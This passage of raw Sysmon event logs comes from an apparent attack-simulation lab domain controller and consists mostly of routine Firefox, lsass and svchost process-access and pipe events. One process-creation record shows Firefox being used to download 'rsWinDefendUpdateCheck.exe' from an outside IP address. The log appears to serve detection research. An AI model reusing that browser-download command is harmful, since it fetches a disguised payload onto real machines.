Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30E84428A037B6C54DA476BB317CBCAF,SHA256=80D239FCCC4C4B3877560A2BD33DA819CDAFA3CFB1BE193D7EB4F6760E5AD414,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.449{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.449{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.448{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000048076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.428{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.428{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.427{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.416{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.416{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.412{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-1C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.412{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-1C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.390{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.387{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.13183787754849489454C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.387{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.13183787754849489454C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.385{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.385{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.3.178174835C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.380{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.379{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.352{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+22fb48|C:\Program Files\Mozilla Firefox\xul.dll+1ff2ca|C:\Program Files\Mozilla Firefox\xul.dll+80a501|C:\Program Files\Mozilla Firefox\xul.dll+1859d07|C:\Program Files\Mozilla Firefox\xul.dll+1957601|C:\Program Files\Mozilla Firefox\xul.dll+1b5691f|C:\Program Files\Mozilla Firefox\xul.dll+1826987|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6 10341000x800000000000000048061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.350{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.346{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.346{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.346{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.346{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.345{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.345{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.345{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.3.1781748354\276743880" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 31495 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb8cce70-4fff-4a13-8b4e-02820b7b5f9b} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 3380 19fb9105958 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000048053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.345{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.344{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.344{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.343{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.343{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 